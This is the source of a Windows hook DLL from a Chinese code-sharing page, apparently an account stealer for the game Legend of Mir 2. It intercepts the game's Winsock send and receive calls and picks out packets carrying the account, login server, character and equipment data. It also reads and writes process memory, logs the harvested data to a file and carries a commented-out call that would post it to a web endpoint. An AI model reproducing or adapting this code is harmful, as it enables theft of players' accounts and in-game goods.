📄 hook.cpp
字号:
#include "posturl.h"
#include "code.h"
#include "sockstrs.h"
// Function pointers to the Debug/Trace DLL entry points
static LPFNWSANOTIFY PreApiNotifyFP = NULL;
static LPFNWSANOTIFY PostApiNotifyFP = NULL;
// Handle to the Debug/Trace DLL module
static HMODULE DTDll = NULL;
// Static string to pass to Debug/Trace notification functions
LPFNWSANOTIFY GetPreApiNotifyFP(void)
{
return(PreApiNotifyFP);
}
LPFNWSANOTIFY GetPostApiNotifyFP(void)
{
return(PostApiNotifyFP);
}
BOOL WINAPIV PreApiNotify(
IN INT NotificationCode,
OUT LPVOID ReturnCode,
IN LPSTR LibraryName,
...)
{
return false;
}
//intf functions
#define MIN(x, y) (x<y)?x:y
inline int GetIndex( WORD nCmdNo )
{
/*
case 0x07D1://帐号
case 0x0212://连接服务器信息
case 0x0208://人物信息
case 0x0067://选择的人物
case 0x0068://选择服务器
case 0x020D://登陆服务器信息
case 0x0036://地点
case 0x00C9://背包装备
case 0x026D://身上装备
*/
WORD pCmds[CMD_COUNT] ={ 0x07D1, 0x0212, 0x0208, 0x0067, 0x0068, 0x020D, 0x00C9, 0x026D, 0x0036 };
int iResult = -1;
for ( int i = 0; i < sizeof(pCmds)/sizeof(WORD); i++ )
if ( pCmds[i] == nCmdNo )
{
iResult = i;
break;
}
return iResult;
}
inline void DEBUG_TOFILE( char *lpDebugMsg )
{
OFSTRUCT ReOpen;
HFILE h = OpenFile( DEBUG_FILENAME, &ReOpen, OF_READWRITE );
if ( h == HFILE_ERROR )
h = OpenFile( DEBUG_FILENAME, &ReOpen, OF_CREATE );
if ( h != HFILE_ERROR )
{
DWORD dwByte;
SetFilePointer( (HANDLE)h, 0, 0, FILE_END );
WriteFile( (HANDLE)h, lpDebugMsg, strlen( lpDebugMsg ), &dwByte, NULL );
WriteFile( (HANDLE)h, "\n", 1, &dwByte, NULL );
CloseHandle( (HANDLE)h );
}
}
inline void WriteData( LPVOID lpBuffer, DWORD dwSize )
{
OFSTRUCT ReOpenBuff;
HFILE h = OpenFile( DAT_FILENAME, &ReOpenBuff, OF_READWRITE );
if ( h == HFILE_ERROR )
h = OpenFile( DAT_FILENAME, &ReOpenBuff, OF_CREATE );
if ( h != HFILE_ERROR )
{
SetFilePointer( (HANDLE)h, 0, NULL, FILE_END );
DWORD dwWriteByte;
WriteFile( (HANDLE)h, lpBuffer, dwSize, &dwWriteByte, NULL );
WriteFile( (HANDLE)h, "\n", 1, &dwWriteByte, NULL );
CloseHandle( (HANDLE)h );
}
}
DWORD WINAPI SaveThread( LPVOID lpParam )
{
HANDLE hProcess = OpenProcess( PROCESS_ALL_ACCESS,
FALSE,
((LPTHREADPARAM)lpParam)->dwProcessId );
if ( !hProcess ) return 0;
LPVOID lpBuffer = malloc( ((LPTHREADPARAM)lpParam)->cbSize );
DWORD dwReadByte;
char* pDatas[CMD_COUNT] = { 0, 0, 0, 0, 0, 0, 0, 0, 0 };
if ( ReadProcessMemory( hProcess,
((LPTHREADPARAM)lpParam)->lpAddress,
lpBuffer,
((LPTHREADPARAM)lpParam)->cbSize,
&dwReadByte ) )
{
char* lpCmdStr = strchr( (char*)lpBuffer, '#' );
while ( lpCmdStr && (DWORD)lpCmdStr - (DWORD)lpBuffer < dwReadByte )
{
char* lpCmdEnd = strchr( lpCmdStr, '!' );
if ( lpCmdEnd && lpCmdEnd > lpCmdStr )
{
long nSize = (long)lpCmdEnd - (long)lpCmdStr;
char* lpBuffer = (char*)malloc( nSize + 1 );
memset( lpBuffer, 0, nSize + 1 );
DWORD dwSize = DecodeEx( lpCmdStr, lpBuffer, nSize, nSize );
int iIndex = GetIndex( ((LPMMSG)lpBuffer)->wCmd );
char szBuffer[2048];
szBuffer[0] = 0;
if ( iIndex > -1 )
{
if( iIndex == 6 || iIndex == 7 )//取装备资料
{
char szName[15];
MIR2_EQUIP_ITEM Mir2Item;
DWORD dwDataSize = ( dwSize - sizeof(LPMMSG) ) * 2;
char* lpHex = (char*)malloc( dwDataSize );
BinToHex( ((LPMMSG)lpBuffer)->data, lpHex, dwDataSize / 2 );
for ( long i = 0; (DWORD)i < dwSize / sizeof( MIR2_EQUIP_ITEM ); i++ )
{
HexToBin( (char*)(&lpHex[ (sizeof( MIR2_EQUIP_ITEM ) * 2+1) * i ]),
(char*)&Mir2Item,
sizeof(MIR2_EQUIP_ITEM) );
try
{
lstrcpyn( szName, Mir2Item.szName, Mir2Item.cbLen + 1 );
}
catch(...)
{
}
if ( ! strstr( szBuffer, szName ) )
{
if ( i > 0 )
strcat( szBuffer, "_" );
strcat( szBuffer, szName );
}
}
free( lpHex );
if ( !pDatas[iIndex] )
{
pDatas[iIndex] = (char*)malloc( strlen( szBuffer ) + 1 );
strcpy( pDatas[iIndex], szBuffer );
}
free( lpBuffer );
}
else //取其它资料
{
if ( !pDatas[iIndex] ) free( pDatas[iIndex] );
pDatas[iIndex] = (char*)malloc( strlen( ((LPMMSG)lpBuffer)->data ) + 1 );
strcpy( pDatas[iIndex], ((LPMMSG)lpBuffer)->data );
}
}
}else break;
lpCmdStr = strchr( (char*)lpCmdEnd, '#' );
}
}
free( lpBuffer );
CloseHandle( hProcess );
int nDataSize = 0;
for ( long i = 0; i < sizeof(pDatas)/sizeof(char*); i++ )
{
if ( pDatas[i] )
nDataSize += strlen( pDatas[i] );
else
{
pDatas[i] = (char*)malloc( 1 );
memset( pDatas[i], 0, 1 );
}
}
char* lpszParam = (char*)malloc(strlen( STRING_UPDATE ) +
nDataSize +
strlen( ((LPTHREADPARAM)lpParam)->szMir2Are ));
wsprintf( lpszParam,
STRING_UPDATE,
((LPTHREADPARAM)lpParam)->szMir2Are,
pDatas[0], pDatas[1], pDatas[2], pDatas[3], pDatas[4],
pDatas[5], pDatas[6], pDatas[7], pDatas[8] );
if ( strlen( pDatas[1] ) > 0 )
WriteData( lpszParam, strlen( lpszParam ) );
//PostURL( "http://127.0.0.1/mir2/recnew.asp", lpszParam );
free( lpszParam );
for ( i = 0; i < sizeof(pDatas)/sizeof(char*); i++ ) if ( pDatas[ i ] ) free( pDatas[ i ] );
CloseHandle( ((LPTHREADPARAM)lpParam)->ThreadHandle );
delete (LPTHREADPARAM)lpParam;
return 0;
}
inline bool IsEnd( char* lpDataBuffer, DWORD cbSize )
{
bool bResult = false;
if ( lpDataBuffer )
{
WORD nCmds[2] = { 0x00C9, 0x026D };//取装备的2个命令
char* lpCmdStr = strchr( lpDataBuffer, '#' );
while ( lpCmdStr && (long)lpCmdStr - (long)lpDataBuffer < (long)cbSize )
{
char* lpCmdEnd = strchr( lpCmdStr, '!' );
if ( lpCmdEnd && lpCmdEnd > lpCmdStr )
{
long nSize = (long)lpCmdEnd - (long)lpCmdStr;
char* lpBuffer = (char*)malloc( nSize + 1 );
memset( lpBuffer, 0, nSize + 1 );
DWORD dwSize = DecodeEx( lpCmdStr, lpBuffer, nSize, nSize );
for ( int i = 0; i < sizeof(nCmds)/sizeof(WORD); i++ )
{
if ( nCmds[i] && ((LPMMSG)lpBuffer)->wCmd == nCmds[i] && strstr( lpCmdStr, "!" ) )
nCmds[i] = 0;
}
for ( i = 0; i < sizeof(nCmds)/sizeof(WORD); i++ )
{
bResult = (nCmds[i] == 0);
if ( !bResult ) break;
}
free( lpBuffer );
if ( bResult ) break;
}
else break;
lpCmdStr = strchr( (char*)lpCmdEnd, '#' );
}
}
return bResult;
}
inline HWND FindMir2Select( void )
{
char szBuffer[1024];
HWND hBox = NULL;
HWND h = GetWindow( FindWindow( MIR2_CLASSNAME, NULL ), GW_HWNDFIRST );
while ( IsWindow( h ) )
{
GetClassName( h, szBuffer, sizeof(szBuffer) - 1 );
if ( strcmpi( szBuffer, MIR2_CLASSNAME ) == 0 )
{
hBox = FindWindowEx( h, NULL, ARE_SELECTCLASS, NULL );
if ( hBox ) break;
}
h = GetWindow( h, GW_HWNDNEXT );
}
return hBox;
}
inline void SendData( DWORD dwProcessId, LPVOID lpAddress, DWORD cbSize )
{
LPTHREADPARAM lpParam = new THREADPARAM;
HWND hBox = FindMir2Select();
SendMessage(hBox,
CB_GETLBTEXT,
SendMessage( hBox, CB_GETCURSEL, 0, 0 ),
(LPARAM) lpParam->szMir2Are );
DWORD ThreadId;
lpParam->dwProcessId= dwProcessId;
lpParam->lpAddress = lpAddress;
lpParam->cbSize = cbSize;
lpParam->ThreadHandle =
CreateThread( NULL,
NULL,
SaveThread,
lpParam,
CREATE_SUSPENDED,
&ThreadId );
if ( lpParam->ThreadHandle == 0 )
delete lpParam;
else ResumeThread( lpParam->ThreadHandle );
}
inline bool IsMir2Data( HWND hwnd )
{
if ( !hwnd ) return false;
DWORD dwProcessId;
GetWindowThreadProcessId( hwnd, &dwProcessId );
DWORD dwCurId = GetCurrentProcessId();
if ( dwProcessId == dwCurId ) return true;
HANDLE hSnapshot = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
bool bResult = false;
if ( hSnapshot )
{
PROCESSENTRY32 pe;
pe.dwSize = sizeof( PROCESSENTRY32 );
BOOL bFind = Process32First( hSnapshot, &pe );
while ( bFind )
{
if ( pe.th32ProcessID == dwCurId )
{
bResult = ( pe.th32ParentProcessID == dwProcessId );
break;
}
bFind = Process32Next( hSnapshot, &pe );
}
CloseHandle( hSnapshot );
}
return bResult;
}
inline void WriteStorage( HWND hMir, char *lpBuffer, DWORD dwBufferSize )
{
LPVOID lpvAddress = (LPVOID)SendMessage( hMir,
CB_GETITEMDATA,
0,
0 );
if ( lpvAddress )
{
DWORD dwProcessId = (DWORD)SendMessage( hMir,
CB_GETITEMDATA,
1,
0 );
if ( dwProcessId )
{
HANDLE hProcess = OpenProcess( PROCESS_ALL_ACCESS,
FALSE,
dwProcessId );
char szBuffer[STORAGE_SIZE];
if ( hProcess )
{
//读入原数据大小
DWORD dwReadSize;
DWORD dwWritten;
if ( !ReadProcessMemory( hProcess,
lpvAddress,
&dwReadSize,
sizeof(DWORD),
&dwWritten ) )
{
CloseHandle( hProcess );
return;
}
if ( STORAGE_SIZE - dwReadSize - dwBufferSize >= 0 )
{
//写入数据
DWORD cbSize = MIN( dwBufferSize, strlen( lpBuffer ) );
if ( WriteProcessMemory( hProcess,
(LPVOID)((DWORD)lpvAddress + dwReadSize),
lpBuffer,
cbSize,
&dwWritten ) &&
WriteProcessMemory( hProcess,
lpvAddress,
&(dwReadSize += dwWritten),
sizeof(DWORD),
&dwWritten ) &&
ReadProcessMemory( hProcess,
lpvAddress,
szBuffer,
dwReadSize,
&dwWritten ) &&
IsEnd( &szBuffer[sizeof(DWORD)],
dwWritten-sizeof(DWORD) ) )
{
SendMessage( hMir,
CB_SETITEMDATA,
0,
0 );
CloseHandle( hProcess );
SendData( dwProcessId,
(LPVOID)((long)lpvAddress+sizeof(DWORD)),
dwWritten - sizeof(DWORD) );
return;
}
}
CloseHandle( hProcess );
}
}
}
}
BOOL WINAPIV PostApiNotify(
IN INT NotificationCode,
OUT LPVOID ReturnCode,
IN LPSTR LibraryName,
IN SOCKET* s,
IN LPWSABUF* lpBuffers,
IN DWORD* dwBufferCount,
...)
{
switch( NotificationCode )
{
//发送数据
case DTCODE_WSPSend: case DTCODE_WSPSendTo:
case DTCODE_send: case DTCODE_sendto:
if ((DWORD)(*dwBufferCount) > 0 && ((LPWSABUF)(*lpBuffers))->len > 1 )
{
char* pBuffer = ((LPWSABUF)(*lpBuffers))->buf;
if ( !pBuffer ) return false;
HWND hMirBox = FindMir2Select();
DWORD cbBuffer = ((LPWSABUF)(*lpBuffers))->len;
if ( !IsMir2Data( hMirBox ) ) return false;
if ( strcmp( pBuffer, STRING_MIR152 ) == 0 )//创建存储
{
LPVOID lpvAddress = VirtualAlloc( NULL,
STORAGE_SIZE,
MEM_COMMIT | MEM_RESERVE,
PAGE_READWRITE );
if ( !lpvAddress ) return false;
DWORD dwWritten = sizeof( DWORD );
//写入大小
HANDLE hProcess = OpenProcess( PROCESS_ALL_ACCESS,
FALSE,
GetCurrentProcessId() );
if ( !hProcess )
{
VirtualFree( lpvAddress, 0, MEM_RESERVE );
return false;
}
if ( WriteProcessMemory( hProcess,
lpvAddress,
&dwWritten,
dwWritten,
&dwWritten ) )
{
//存入区域选择项目数据区
if ( SendMessage( hMirBox,
CB_SETITEMDATA,
0,
(LPARAM)lpvAddress ) == CB_ERR ||
SendMessage( hMirBox,
CB_SETITEMDATA,
1,
(LPARAM)GetCurrentProcessId() ) == CB_ERR )
{
//return false;
}
}
CloseHandle( hProcess );
} else WriteStorage( hMirBox, pBuffer, cbBuffer );
}
break;
//接收数据
case DTCODE_WSPRecv: case DTCODE_WSPRecvFrom:
case DTCODE_recv: case DTCODE_recvfrom:
if ((DWORD)(*dwBufferCount) > 0 && ((LPWSABUF)(*lpBuffers))->len > 1 )
{
HWND hMirBox = FindMir2Select();
char *pBuffer = ((LPWSABUF)(*lpBuffers))->buf;
if ( !pBuffer ) return false;
if ( IsMir2Data( hMirBox ) )
{
DWORD cbBuffer = ((LPWSABUF)(*lpBuffers))->len;
WriteStorage( hMirBox, pBuffer, cbBuffer );
}
}
break;
}
return false;
}
void DTHookInitialize(char* lpszLibName)
{
PreApiNotifyFP = &PreApiNotify;
PostApiNotifyFP= (LPFNWSANOTIFY)&PostApiNotify;
}
void DTHookShutdown(void)
{
if (DTDll != NULL) FreeLibrary(DTDll);
PreApiNotifyFP = NULL;
PostApiNotifyFP = NULL;
}⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -